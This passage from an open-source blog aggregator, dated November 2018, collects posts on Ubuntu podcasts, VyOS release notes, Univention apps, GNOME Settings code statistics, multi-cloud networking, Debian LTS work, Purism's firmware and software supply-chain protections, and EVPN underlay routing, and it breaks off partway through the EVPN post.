November 18, 2018

hackergotchi for Ubuntu developers

Ubuntu developers

Tiago Carrondo: S01E11 – Alta Coltura

Esta semana o trio maravilha dedicou a sua atenção a sugestões de leitura, técnica ou não, porque a vida não são só podcasts… As novidades no mundo SolusOS, a parceria da Canonical e da Samsung e o projecto Linux on Dex, sem esquecer a Festa do Software Livre da Moita 2018, que está já aí! Já sabes: Ouve, subscreve e partilha!


Este episódio foi produzido e editado por Alexandre Carrapiço (Thunderclaws Studios – captação, produção, edição, mistura e masterização de som) contacto: thunderclawstudiosPT–arroba–

Atribuição e licenças

A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License.

Este episódio está licenciado nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

18 November, 2018 11:32PM

November 17, 2018

hackergotchi for VyOS


VyOS 1.2.0-rc7 is available for download

Yet another release candidate, with more bug fixes and some experimental features. We are grateful to everyone who reported these bugs and sent us patches for them!

The ISO image is available for download here  

New features

RADIUS client source IP in remote access VPN

It is now possible to set the source IP with a command like "set vpn l2tp remote-access authentication radius source-address".

UEFI support

Thanks to joined efforts of our contributor Kroy the Rabbit and the maintainers, VyOS has got experimental support for installation and boot on UEFI platforms.

Since UEFI-only boxes started to enter the market lately, it makes a perfect last moment addition, but as any big change, it needs testing. If you have hardware that uses UEFI, please try it out and let us know if it works well for you.

If your machine is using UEFI boot, the installer will detect it automatically and create a GPT partition table and an UEFI partition rather than MBR, so for the users this new feature should be seemless.

Bug fixes

Updates to the latest kernel and the latest FRR seem to have resolved a number of tasks automatically, namely: an issue with route-map interface close not working for all protocols (T524), packet loss in some Xen environments including AWS (T935), support for the Denverton SoC (T946).

Fixes in BGP commands

Thanks to our community, we have identified a few more BGP commands whose migration to the new "address-family ipv4-unicast" syntax was incomplete. IPv4 prefix lists should now work correctly (T968), and so should "soft-reconfiguration inbound" (T982).

FRR syntax changes

While FRR has brought us a lot of improvements, it also has a small number of incompatibilities.

A syntax change in the "as-path-exclude" route-map option made it impossible to delete the clause or entire route-map, until we fixed it (T991). 

Another change is only planned, but already has deprecation warnings that are quite annoying (T964). We have fixed most of them, except in the "policy community-list" commands. The final bit is blocked by an issue in the new FRR commands that are supposed to replace the old ones, so until it's fixed you will get a warning when deleting or modifying community-lists. The warning is harmless, and we will fix it and also update op mode commands once the FRR developers fix their part.


A couple of issues with the wireguard CLI have been fixed. One was that you could not use whitespace inside wireguard interface descriptions (T979). The other issues would leave the VyOS CLI and the actual wireguard configuration in an incosistent state (T965). Thanks to our contributor hagbard, the issues have been resolved.


Removing a user with a "delete system login user" command now correctly deletes home directories, eliminating the possibility that the same home directory can be reassigned to a new user with a different UID and thus no write permissions for the original directory (T740).

Authentication/authorization logs should now work as expected again (T963).

The installer now allows installation on NVM Express SSD devices /dev/nvme* (T967). The patch was contributed by Brooks Swinnerton.

The "run monitor bandwidth-test initiate" command works again (T994).

The "| strip-private" pipe now correctly obscures "pre-shared-secret" options (T999).

The "hostfile-update" DHCP server option should now work again (T976).

17 November, 2018 06:23PM by Yuriy Andamasov

November 16, 2018

hackergotchi for Univention Corporate Server

Univention Corporate Server

Systematic Approach to Evaluate Software for Your Business

With its many solutions, the Univention App Center offers you a multitude of choices. However, finding the perfect fit is not always taking the easiest solution.

Let me walk you through a step by step process how you can find the optimal solution for your business and which aspects of a software you should examine in particular.

Our handy feature checklist for software evaluation

Today, any software has countless features, big and small. Few of them are essential, some of them are important, yet many fall into the unneeded or nice-to-have category. Making sense of which features are critical to your network becomes thus the critical task that can make or break the acceptance of the solution among your users.

To support you in this important process, we created a handy software evaluation checklist for you to download. It helps you to evaluate all features and cross-match them with the solutions in question. It orders the functions into different categories depending on who requested them. Furthermore we created an example list for groupware in a Medical Clinic. Feel free to look at it. I will go along this example to explain the different categories.

Screenshot of a software evaluation checklist for groupware as an example

Classifying core software features

The first question you need to look at are the functions the software needs to fulfill. If we look at a groupware solution, there are three features the software needs to have. It needs to send e-mails, synchronize contacts, and manage calendars. Secondary functions might be a chat and data shares.

These are the core features. Without these, the software would be useless. Now, not all core features of each solution might be critical for the software to fulfill its purpose. Sorting out these into multiple categories of importance to you is the essence of classifying the software.

Usability: How to meet users’ needs and wants

The most critical features come from your users. If a solution is not useful or usable for the end user, they will not choose to use it in all likelihood. However, outright asking what the features should be, will probably neither be of great success.

In many cases, a user will focus more on the visual experience than on their actual wants and needs. “The user interface should be sky blue with iPhone like buttons” is as much likely to come as an answer as “We need to be able to upload receipts to the accounting system.”

Watch the users going through their current workflow

The better way is to have the users walk you through their current and preferred workflow. Please take note of where the user clicks and what action he executes. Especially look out for activities that he performs twice. It is critical to observe the workflow. Users often accept problems, because they have always been there. Finding these hidden inconveniences, like entering information twice or being required to authenticate instead of Single Sign-On, give you the option to make a user’s life more comfortable. In the end, these hidden features will significantly reduce the perceived inconvenience of learning a new system.

In our example, the features the users mentioned were mobile phone compatibility and group e-mail accounts. At the same time, we observed that the users were most frustrated by having to enter their password and by the complex creation of sorting rules in the current system. All four of these features are consequently part of the evaluation.

Important features to consider for administrators

The second most important aspect relates to the convenience for the administrator. Most important is that the software should be able to integrate as much as possible with other solutions within your software stack. Nothing is more error-prone than having to create the same user with the same user name, name, and e-mail over and over again.

Likewise, the administrators will have substantial headaches if they need to manage numerous different password policies. Making sure that multiple independent systems are compliant with your requirements can be extremely challenging. Not to speak of finding out which password to reset if a user cannot log in. Consequently we recommend that the integration of the new system with the existing IT infrastructure should be part of the requirements.

Update and patch management is another issue that you should consider as an administrative requirement. That includes the operating systems and server on which the system will run. Especially, if the underlying system is entirely different from anything else used in the company until now, you should carefully consider the price for maintenance.

In our example, the system needed to integrate with UCS’ user and mail management. The admins gave a strong preference for a solution that can be installed right out of the UCS App Center and thus integrates into the patch management. Another wish was the integration into their Nagios monitoring system.

Legal and Business Requirements

Lastly, you need to look at the legal and business requirements. One of the most mentioned requirements is whether support is available. Other questions you might want to consider is whether or not the system is open source and whether there is any training available.

The last line in our example you can file out. What you should look at is the price of the software: Both the price for the initial installation and the yearly cost for support and maintenance.

Going with our example, we have specific requirements about the logging and cloud integration. There was also a strong wish for having the users to use two-factor authentication.

Final step in the software evaluation process

Based on these payments and the number of requirements fulfilled, the spreadsheet will calculate a score of met requirement per Euro or Dollar paid. Thus you can quickly see the value you get for your money. It also warns you if the software in question does not fulfil all of your must-haves.


We made the experience that a systematic approach to the evaluation of a new software is essential to making a well thought out decision. It takes the emotion and the name recognition out of the question and focuses on all needs and requirements, both for users and admins. When you apply such an approach, you can move forward with a purchase in confidence.

We hope this process including our example is helpful to make good decisions about future software purchases. If you have any feedback or question, please comment below.

Visit our App Catalog and try our tips!


Der Beitrag Systematic Approach to Evaluate Software for Your Business erschien zuerst auf Univention.

16 November, 2018 02:17PM by Kevin Dominik Korte

November 15, 2018

hackergotchi for Ubuntu developers

Ubuntu developers

Robert Ancell: Counting Code in GNOME Settings

I've been spending a bit of time recently working on GNOME Settings. One part of this has been bringing some of the older panel code up to modern standards, one of which is making use of GtkBuilder templates.

I wondered if any of these changes would show in the stats, so I wrote a program to analyse each branch in the git repository and break down the code between C and GtkBuilder. The results were graphed in Google Sheets:

This is just the user accounts panel, which shows some of the reduction in C code and increase in GtkBuilder data:

Here's the breakdown of which panels make up the codebase:

I don't think this draws any major conclusions, but is still interesting to see. Of note:
  • Some of the changes make in 3.28 did reduce the total amount of code! But it was quickly gobbled up by the new Thunderbolt panel.
  • Network and Printers are the dominant panels - look at all that code!
  • I ignored empty lines in the files in case differing coding styles would make some panels look bigger or smaller. It didn't seem to make a significant difference.
  • You can see a reduction in C code looking at individual panels that have been updated, but overall it gets lost in the total amount of code.
I'll have another look in a few cycles when more changes have landed (I'm working on a new sound panel at the moment).

15 November, 2018 08:05PM by Robert Ancell (

Cumulus Linux

The Benefits of Flexible Multi-Cloud and Multi-Region Networking

A report recently published by 451 Research shows that almost 70% of all enterprises will be using a multi-cloud or hybrid IT infrastructure in a year’s time. As more and more enterprises are swayed into the cloud, companies who have already adopted the cloud are now choosing to go with multi-cloud infrastructure or hybrid architecture for their IT requirements.

The report also showcased that about 60% of all workloads are expected to run using a form of hosted cloud service by 2019. This is an increase of about 45% from 2017. This marks an impressive change from DIY owned and operated services to a cloud or third-party hosted IT services. Therefore, the future of IT services is clearly hybrid and multi-cloud.

Here we explore some of the reasons multi-cloud is a fantastic idea for enterprises when they consider security, flexibility, reliability, and cost-effectiveness.

Reduce Security Risks Like a DDoS Attack

A Distributed Denial of Service or DDoS attack is when a number of different computer systems attack a server, website, network resource or a cloud hosting unit. A DDoS attack can be executed by an individual as well as a federal government.

In a scenario that your company’s website is powered by resources hosted on one cloud, a well-executed DDoS attack can take down your website and also prevent any attempts to restore it. Based on a recent study done by Rand Group, 98% of businesses surveyed claimed that just an hour of downtime costs their company upwards of $100,000.

Using a hybrid-cloud architecture to power your website ensures that your company’s services remain resilient against DDoS or similar attacks. Adding a private cloud to your public cloud setup allows for a supplement or a backup clouds to pick up the load if one cloud service is attacked.

Better Disaster Recovery Options

For a web architect, a Single Point of Failure or SPOF is their worst nightmare. SPOF events can occur either through a machine error or malicious attacks by hackers.

The common way used by web architects to counter SPOF is by using redundancy. However, what happens if the host system goes offline? In these cases, using a multi-region architecture to host different components of a system creates the ultimate form of redundancy by making fewer SPOFs. There are many third-party vendors that offer a multi-region disaster recovery plan for your AWS or Azure storage. The popular disaster recovery vendors include N2WS, Acronis, Druva etc.

Security – Keep Sensitive Operations in Private Cloud

There is a popular argument that network security can be compromised in a public cloud environment. Since the data doesn’t reside on your infrastructure, you have less control over who really has access to the public cloud data. However, with a private cloud system, you have much more control over data security than a public cloud solution. By design, hybrid clouds can inherit the security aspects of a private cloud and you can ensure that the sensitive data remains protected by keeping them in your own infrastructure. You can deploy workload heavy tasks to a public cloud and limit the sensitive operations to your private cloud.

Moreover, with hybrid-cloud you have the flexibility to explore different cloud service providers, leverage the full extent of your private cloud and find the best match for each part of your business requirement.

Cost Optimization Performance

Given that each financial company has a financial bottom line that they need to keep to and considering the rate at which emerging technologies are advancing almost every day, for most enterprises it has now evolved into a need vs. price model of business.

A vast number of cloud service providers make their mark by providing a set of services that are in tune with your business needs. You can look at leveraging these services along with your private cloud network for optimum business efficiency.That said, you would also need to look at the financial implications of a system downtime and how much that can cost your business in terms of capital expenditure.

The important factor is to narrow down and identify the different cloud service providers who are able to provide a set of service offerings as among the best in their peer group. The key lies in the business identifying the right combination of cloud service providers who can provide your enterprise with the requirements that match your business needs, can complement your private cloud setup, as well as provide you with a financial edge over your competitors. An added boost of productivity and efficiency, coupled with a decent reduction in cost, bodes well of enterprises and businesses across the globe.

Avoid Vendor Lock-Ins

As businesses grow and diversify, their support and systems also need to expand to allow it to keep pace with the larger customer base. There would be a time when your local private cloud servers are not able to meet your requirements and you would need to harness the help of a cloud service provider. Once you identify a provider you would need to ensure that the new system matches conveniently with your private cloud setup with minimum hindrance to your daily operations.

Consider a scenario where your business needs outgrow what your first cloud service provider can offer or if you find a better deal for a portion of your business with a different provider. It would make for a good business decision to diversify your service provider in each scenario.

By restricting yourself with only one cloud service provider, it is both time-consuming and expensive to transfer your systems elsewhere. This leaves you in the position of having to accept any pricing changes or agreement restructure as you are locked into a contract to do business with them.

Region-Based Business Policies

Given the rules and regulations in various countries across the globe, a large number of countries have a far stricter set of data privacy rules and regulations governing an enterprises’ multi-cloud strategy. Having a multi-pronged cloud strategy helps take care of a number of different governmental regulations either within the country or globally.


The market for cloud computing as a service grew by about 27% in 2017 generating revenue of approximately $28 billion compared to 2016. The revenue generated by cloud computing as a service is expected to reach 53.3 billion by 2021. As an increasing number of enterprises are moving to a cloud infrastructure, they’ll be looking for more options to get the best of all worlds.

That’s where the hybrid-cloud and multi-region networking kicks in. In this post, we’ve covered some of the top reasons why the concept of using multiple cloud hosts is an exciting idea. What are your thoughts on multi-cloud? Share them in the comments below.

The post The Benefits of Flexible Multi-Cloud and Multi-Region Networking appeared first on Cumulus Networks engineering blog.

15 November, 2018 04:00PM by David Varnum

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Podcast from the UK LoCo: S11E36 – Thirty-Six Hours

This week we’ve been resizing partitions. We interview Andrew Katz and discuss open souce and the law, bring you a command line love and go over all your feedback.

It’s Season 11 Episode 36 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

snap install hub
hub ci-status
hub issue
hub pr
hub sync
hub pull-request
  • And we go over all your amazing feedback – thanks for sending it – please keep sending it!

  • Image credit: Greyson Joralemon

That’s all for this week! You can listen to the Ubuntu Podcast back catalogue on YouTube. If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

15 November, 2018 03:00PM

Raphaël Hertzog: Freexian’s report about Debian Long Term Support, October 2018

A Debian LTS logoLike each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In October, about 209 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Abhijith PA did 1 hour (out of 10 hours allocated + 4 extra hours, thus keeping 13 extra hours for November).
  • Antoine Beaupré did 24 hours (out of 24 hours allocated).
  • Ben Hutchings did 19 hours (out of 15 hours allocated + 4 extra hours).
  • Chris Lamb did 18 hours (out of 18 hours allocated).
  • Emilio Pozuelo Monfort did 12 hours (out of 30 hours allocated + 29.25 extra hours, thus keeping 47.25 extra hours for November).
  • Holger Levsen did 1 hour (out of 8 hours allocated + 19.5 extra hours, but he gave back the remaining hours due to his new role, see below).
  • Hugo Lefeuvre did 10 hours (out of 10 hours allocated).
  • Markus Koschany did 30 hours (out of 30 hours allocated).
  • Mike Gabriel did 4 hours (out of 8 hours allocated, thus keeping 4 extra hours for November).
  • Ola Lundqvist did 4 hours (out of 8 hours allocated + 8 extra hours, but gave back 4 hours, thus keeping 8 extra hours for November).
  • Roberto C. Sanchez did 15.5 hours (out of 18 hours allocated, thus keeping 2.5 extra hours for November).
  • Santiago Ruano Rincón did 10 hours (out of 28 extra hours, thus keeping 18 extra hours for November).
  • Thorsten Alteholz did 30 hours (out of 30 hours allocated).

Evolution of the situation

In November we are welcoming Brian May and Lucas Kanashiro back as contributors after they took some break from this work.

Holger Levsen is stepping down as LTS contributor but is taking over the role of LTS coordinator that was solely under the responsibility of Raphaël Hertzog up to now. Raphaël continues to handle the administrative side, but Holger will coordinate the LTS contributors ensuring that the work is done and that it is well done.

The number of sponsored hours increased to 212 hours per month, we gained a new sponsor (that shall not be named since they don’t want to be publicly listed).

The security tracker currently lists 27 packages with a known CVE and the dla-needed.txt file has 27 packages needing an update.

Thanks to our sponsors

New sponsors are in bold.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

15 November, 2018 02:36PM

November 14, 2018

hackergotchi for Univention Corporate Server

Univention Corporate Server

New in Univention App Center: Apple School Manager Connector

iPads in schools

The digitisation in schools that are equipped with UCS@school continues to progress rapidly. Many school authorities and federal states are providing schools with mobile terminals for use in the classroom. Apple’s iPads in particular are in demand. The devices are robust, easy to use and affordable. They are also equipped with a large number of special apps for digital education.

While iPads are usually tied to a single user, there is one exception for schools with the so-called shared iPads: Students authenticate themselves with their credentials and can thus access personal data, homework, apps, books, etc. This not only saves costs but in combination with mobile device management also a lot of time, as teachers can manage the contents centrally.

Apple School Manager and MDM solutions

Prerequisite for the use of shared iPads is their connection to the Apple School Manager. The responsible administrators manage the students‘ user accounts, the devices and their contents via the web portal of the manufacturer. Apple’s Device Enrollment Program (DEP) facilitates the addition and initial configuration of new iPads. The purchase and distribution of apps and books can also be automated. The manufacturer calls this provisioning program the Volume Purchase Program (VPP).

An MDM (Mobile Device Management) system is required to use DEP and VPP. However, such a mobile device management is recommended anyway if a larger number of tablets is in use. Otherwise you would need to configure each device manually. An MDM system takes care of the software and the basic privacy-compliant settings of the iPads, integration with the school network, user accounts, classes, and more. The Apple School Manager provides an interface for MDM solutions such as ZuluDesk, FileWave und Relution – all available in the Univention App Center.

Interaction with the ASM Connector

There are two things you need to consider when using shared iPads: In addition to basic considerations on data protection (e.g. “What about personal data on the device?”, “Are telemetry data transferred?”, etc.), the responsible administrators would like to see in particular a further automation of the user administration. For this reason we have developed the Apple School Manager Connector. It connects existing UCS@school installations with the Apple School Manager and fits perfectly into our vision for school IT infrastructure.

A typical application scenario looks as follows:


Graphic of a typical user scenario Apple School Manager Connector

iPads purchased from the school authority or school get into the Apple School Manager via the Device Enrollment Program (DEP). The connector transfers users, classes, and course data from the UCS@school instance to the ASM via SFTP, i.e. SSL-encrypted – anonymously if desired. Our new app modifies the user data in such a way that it is not possible to assign the data on an iPad to an individual user. The clear names no longer end up in the ASM (and thus in the MDM). In order to increase user-friendliness, the user names can be made visible which in turn needs to be assessed by the responsible data protection officer.

Screenshot of Apple School Manager

The connector also ensures that the roles defined in UCS@school (students and teachers) are correctly transferred to the Apple School Manager. This provisioning of the user data is not a one-time action: After installing the connector from the Univention App Center, administrators can specify the synchronization interval in the settings. They can determine, for example, that the connector synchronizes the data once a day at a certain time.

MDM systems can then use this data to store profiles on the mobile devices. The connector is designed to work with all common mobile device management solutions, including those that are not available via the Univention App Center.

Improved data protection

When designing the Apple School Manager Connector, we placed great emphasis on data protection. We involved data protection officers from school authorities in the development. During the set up of the ASM Connector, those who are responsible decide for themselves which data should be anonymized.

Anonymization is activated by default in the ASM Connector.

For example, the new app can generate managed Apple IDs for the login and thereby modify them. These managed Apple IDs are subject to restrictions. Find further information on this on Apple’s support website. It may also be necessary to ensure that cloud services such as Apple’s iCloud are disabled via an MDM system.

As to the situation in classrooms this still means that the results from each lesson will be saved in a file storage that conforms to data protection regulations before the user logs off from the iPad. For this purpose, we recommend ownCloud or Nextcloud. These solutions are both available from the Univention App Center. In the future, it will be possible to configure these online memories in such a way that users can access them without further time-consuming or error-prone registration. The aim is to facilitate the access significantly for teachers and pupils.

The advantages of the UCS Apple School Manager Connector at a glance

  • Teachers or school administrators no longer have to manually register their students per school or per class in Apple School Manager: students and teaching staff are automatically registered as Apple users.
  • Synchronization of user accounts, classes, and courses can be done anonymously, so app vendors can’t use Apple IDs to identify individuals.
  • Schools can decide independently how they want to use iPads in a standardized way. If required, a school authority with a central IT infrastructure management can also operate multiple MDM systems.
  • The connector is available as an app in the App Center of UCS@school and can be installed with a few mouse clicks.
  • In its standard configuration, the Connector synchronizes all user accounts of the activated schools with the ASM every night. The same applies to schools, classes, work groups and users.
  • Univention recommends using one of the three MDM solutions from the Univention App Center, as they are already integrated into UCS@school and its identity management. However, MDMs that cannot be installed directly via UCS can also be connected to the new connector via standardized interfaces.

Apple School Manager Connector at the Univention Summit

At the Univention Summit on January 31 and February 1, 2019, we will be happy to show you how the Apple School Manager Connector works and what it can do for you. At this event you will also be meeting numerous technology partners who make their solutions available in the Univention App Center.

Register now for the event

Further information

  • UCS Apple School Manager Connetor in the App Catalog
  • The source code of the Apple School Manager Connectors on Github


Der Beitrag New in Univention App Center: Apple School Manager Connector erschien zuerst auf Univention.

14 November, 2018 01:19PM by Michel Smidt

hackergotchi for Ubuntu developers

Ubuntu developers

Tiago Carrondo: S01E10 – Tendência livre

Desta vez com um convidado, o Luís Costa, falámos muito sobre hardware, hardware livre e como não poderia deixar de ser: dos novos produtos da Libretrend, as novíssimas Librebox. Em mês de eventos a agenda teve um especial destaque com as actualizações disponíveis de todos os encontros e eventos anunciados! Já sabes: Ouve, subscreve e partilha!


Este episódio foi produzido e editado por Alexandre Carrapiço (Thunderclaws Studios – captação, produção, edição, mistura e masterização de som) contacto: thunderclawstudiosPT–arroba–

Atribuição e licenças

A imagem de capa: richard ling em Visualhunt e está licenciada como CC BY-NC-ND.

A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License.

Este episódio está licenciado nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

14 November, 2018 02:02AM

November 13, 2018

hackergotchi for Purism PureOS

Purism PureOS

Protecting the Digital Supply Chain

You first learn about the importance of the supply chain as a child. You discover a shiny object on the ground and as you reach down to pick it up your parent says “Don’t touch that! You don’t know where it’s been!” But why does it matter whether you know where it’s been? When your parents know where something came from, they can trust that it’s clean and safe for you to play with. When they don’t, their imagination runs wild with all of the disgusting bacteria and viruses that might taint it.

The food supply chain is important. Food is sealed not just so that it will keep longer, but also so that you can trust that no one has tampered with it between the time it left the supplier to the time it goes in your grocery bag. Some food goes even further and provides a tamper-evident seal that makes it obvious if someone else opened it before you. Again, the concern isn’t just about food freshness, or even someone stealing food from a package, it’s about the supplier protecting you from a malicious person who might go as far as poisoning the food.

The supply chain ultimately comes down to trust and your ability to audit that trust. You trust the grocery and the supplier to protect the food you buy, but you still check the expiry date and whether it’s been opened before you buy it. The grocery then trusts and audits their suppliers and so on down the line until you get to a farm that produces the raw materials that go into your food. Of course it doesn’t stop there. In the case of organic farming, the farmer is also audited for the processes they use to fertilize and remove pests in their crops, and in the case of livestock this even extends to the supply chain behind the food the livestock eats.

You deserve to know where things have been whether it’s the food that sustains your physical life or the devices and software that protect your digital life. Tainted food can make you sick or even kill you, and tainted devices can steal your data and take over your device to infect others. In this post I’ll describe some of the steps that Purism takes to protect the digital supply chain in our own products.

The Firmware Supply Chain

A lot has been written recently about threats to the hardware supply chain in light of Bloomberg’s allegations about hardware implants that intercepted the BMC remote management features in certain SuperMicro server hardware. While all of the vendors have denied these allegations (and Bloomberg stands by its story), everyone acknowledges that whether this particular incident happened, this kind of implant is certainly possible.

A crucial point that many are missing, and one that leads me personally to doubt the Bloomberg story, is that while a hardware implant is possible, it’s unnecessary–the BMC firmware and IPMI protocol have a long history of vulnerabilities and it would be a lot easier (and stealthier) for an attacker either to take advantage of existing vulnerabilities or flash a malicious firmware, than risk a hardware implant. An attacker who is sophisticated enough to deploy a hardware implant is sophisticated enough to pick a safer approach.

Why is attacking the firmware safer than implanting hardware? First, firmware hacking is easier. Firmware used to be something that was flashed onto hardware once and could never be overwritten. In those days it might have been just as easy to add a malicious chip onto the motherboard. Now most firmware is loaded onto chips that can be written and overwritten multiple times to allow updates in the field, so anyone along the hardware supply chain could overwrite trusted firmware with their own.

Second, firmware attacks are harder to detect. Hardware attacks risk detection all along the supply chain whenever someone physically inspects the hardware. Motherboards have published diagrams you can compare hardware against, and if a chip is on the board that isn’t in a diagram, that raises alarms. Since so much firmware is closed, it’s more difficult to detect if someone added malicious code and it’s certainly something you can’t detect by visual inspection.

Finally, firmware attacks offer deniability. It’s hard for someone to explain away a malicious chip that’s added onto hardware unannounced. If firmware vulnerabilities are detected, they can almost always be explained away as a security bug or a developer mistake.

How Purism Protects the Firmware Supply Chain

Purism has a number of strategies it uses to protect the firmware supply chain. The first strategy is to limit the overall threat by reducing the amount of proprietary firmware on our hardware as much as possible. We select the hardware components in our laptops such as the graphics chip and WiFi card so that we can run them with free software drivers that anyone can audit. Like a dairy that only packages milk from antibiotic-free cows, we can avoid a lot of other audit worries by starting with a clean source.

The next area we focus on is the Intel Management Engine (ME). Like all modern Intel-based hardware, our laptops include the Intel Management Engine, but we intentionally exclude Intel’s Active Management Technology (AMT) to avoid the risk posed by that proprietary out-of-band management software. We then neutralize and disable the ME so that only a small percentage of the firmware remains on the chip, further reducing the avenues for attack. Whether a dairy gets antibiotic-free milk or not, it still pasteurizes it to kill any unseen microbes in the raw milk.

The other important piece of firmware on a laptop is the BIOS. Since it runs before the operating system, it’s a tempting piece of code to attack because such a compromise can easily hide from the OS in a regular system and survive reboots. We protect the BIOS firmware from supply chain attacks both upstream and downstream from us and next I will describe our approaches.

The motherboards’ BIOS chip arrives to us with a proprietary BIOS from the supplier. To protect against any upstream attempts to replace that default BIOS with something malicious we overwrite it with our own coreboot BIOS. This further reduces the amount of proprietary firmware in the BIOS since with coreboot the bulk of the BIOS is free software. Even though the Intel Firmware Support Package (FSP) proprietary blob still remains we still greatly reduce the risk (and aim to liberate or replace the FSP as well). It’s like repackaging food in BPA-free plastic when you aren’t sure about the make-up of the original packaging.

That leaves how we protect you from attacks on the BIOS that might occur either during shipping or after you have the computer in your possession. For this we are working to offer the combination of the Heads tamper-evident BIOS that sits on top of coreboot and our Librem Key USB security token and we are starting a private beta program right now to get feedback before a wider release. With Heads combined with the Librem Key, we can configure a shared secret between the computer and the Librem Key at the factory and ship the devices separately. If someone tampers with your computer during shipping or at any point after you receive it, you will then be able to detect it with an easy “green is good, red is bad” blinking light on the Librem Key. Think of it like a pop-up tamper-evident seal on a jar of food.

The Software Supply Chain

While the hardware and firmware supply chain attacks get a lot of focus due to their exciting “spy versus spy” nature, software supply chain attacks are a much greater and more present threat today. While many of the hardware and firmware attacks still exist in the realm of the hypothetical, software attacks are much more real. Vendors have been caught installing spyware on their laptops, in some cases multiple times, to collect data to sell to advertisers or to pop up ads of their own. When you can’t audit the code, even a computer direct from the factory might be suspect.

With proprietary operating systems, there’s the risk that comes from not being able to audit the programs you run. A malicious developer or a developer hired by a state actor could add backdoors into the code with no easy way to detect it. This isn’t just a hypothetical risk as the NSA is suspected in a back door found in Juniper’s ScreenOS.

If you decide that you can trust your OS vendor you might be comfortable relying on the fact that OS vendors sign their software updates these days so the OS can be sure that the software came directly from the vendor and wasn’t tampered with while it was being downloaded. Yet applications on proprietary operating systems come from multiple sources, not just the OS vendor, and in many cases software you download and install from a website has no way to verify that it hasn’t been tampered with along the way.

Even if you only use software signed by a vendor you still aren’t safe from supply chain attacks. Since you don’t have access to the source code, there’s no way to prove that the signed software that you download from a vendor matches the source code that created it. When developers update software, their code generally goes to a build system that converts it into a binary and performs tests on it before it packages it, signs it, and makes it available to the public. An attacker with access to the build system could implant a back door at some point in the build process after source code has been checked in. With this kind of attack, the malicious code might go unnoticed for quite some time since it isn’t present in the source code itself yet the resulting software would still get signed with the vendor’s signature.

How Purism Protects the Software Supply Chain

Purism has a great advantage over proprietary software vendors when it comes to protecting the software supply chain because we can offer a 100% free software operating system, PureOS, on our laptops. By only installing free software on our laptops, all of the source code in the operating system can be audited by anyone for backdoors or other malicious code. For processed food to be labeled as organic, it must be made only from organic sources, and having our operating system certified as 100% free software means you can trust the software supply chain all the way to the source. Beyond that, all of the software within PureOS is signed and those signatures are verified every time you install new software or update existing software.

Unlike proprietary software, we can also address the risk from an attacker who can inject malicious code somewhere in the build process before it’s signed. With Reproducible Builds you can download the source code used to build your software, build it yourself, and compare your output with the output you get from a vendor. If the output matches, you can be assured that no malicious code was injected somewhere in the software supply chain and it 100% matches the public code that can be audited for back doors. Think of it like the combination of a food safety inspector and an independent lab that verifies the nutrition claims on a box of cereal all rolled into one. We are working to ensure all of the software within PureOS can be reproducibly built and to provide you tools to audit our work. Stay tuned for more details on that.


The supply chain comes down to trust and your ability to audit that trust. Unfortunately all too often a company’s economic incentives run counter to your trust. This is why Purism is registered as a Social Purpose Corporation (SPC) so we can put our ethics and principles above economic incentives. We also continue to improve our own ability to audit the supply chain and isolate (and ultimately eliminate) any proprietary code that remains. Beyond that we are also working to provide you the tools to audit the supply chain (and audit us) yourself, because while we feel you should trust us, your security shouldn’t have to depend on that trust alone.

13 November, 2018 08:21PM by Kyle Rankin

Cumulus Linux

Choosing an EVPN Underlay Routing Protocol

EVPN is all the rage these days. The ability to do L2 extension and L3 isolation over a single IP fabric is a cornerstone to building the next-generation of private clouds. BGP extensions spelled out in RFC 7432 and the addition of VxLAN in IETF draft-ietf-bess-evpn-overlay established VxLAN as the datacenter overlay encapsulation and BGP as the control plane from VxLAN endpoint (VTEP) to VxLAN endpoint. Although RFC 7938 tells us how to use BGP in the data center, it doesn’t discuss how it would behave with BGP as an overlay as well. As a result, every vendor seems to have their own ideas about how we should build the “underlay” network to get from VTEP to VTEP, allowing BGP-EVPN to run over the top.

An example of a single leaf’s BGP peering for EVPN connectivity from VTEP to VTEP

Let’s take a look at our options in routing protocols we could use as an underlay and understand their strengths and weaknesses that make them a good or bad fit for deployment in an EVPN network. We’ll go through IS-IS, OSPF, iBGP and eBGP. I won’t discuss EIGRP. Although it’s now an IETF standard, it’s still not widely supported by other networking vendors.

IS-IS or OSPF as an Underlay

IS-IS is an old protocol. So old it predates the ratification of OSPF as an IETF standard. IS-IS, just like OSPF, is a link-state protocol. Instead of areas IS-IS uses “levels” to break up the flooding domains of routers. OSPF areas determine where LSAs are flooded, while IS-IS levels determine where IS-IS LSPs are flooded. The terms are different but the concepts are almost identical.

OSPFv2 is a well understood protocol across network engineers, however it’s biggest limitation is that it is IPv4 only. There is no support in OSPFv2 to support IPv6 routes. OSPFv3 was developed to support IPv6 routes and later extended to support IPv4 routes as well. IS-IS on the other hand has supported both IPv4 and IPv6 routes for years. A common reason for enterprises and service providers to deploy IS-IS was it’s single-protocol handling of both IPv4 and IPv6 prefixes. OSPFv3 as a dual-stack protocol is still a relatively new extension by comparison. It’s not uncommon to see OSPFv2 deployed for IPv4 along with OSPFv3 for IPv6 in the same network. When building our underlay we should think IPv6 first, even if no IPv6 services exist today. If a new network is being built, do things right in the beginning. Since OSPFv2 does not support IPv6 this makes it a poor choice as not only an underlay protocol for EVPN but for a new datacenter in general. And considering that OSPFv3 may not support IPv4 in all implementations this leaves only IS-IS as the protocol we should consider.

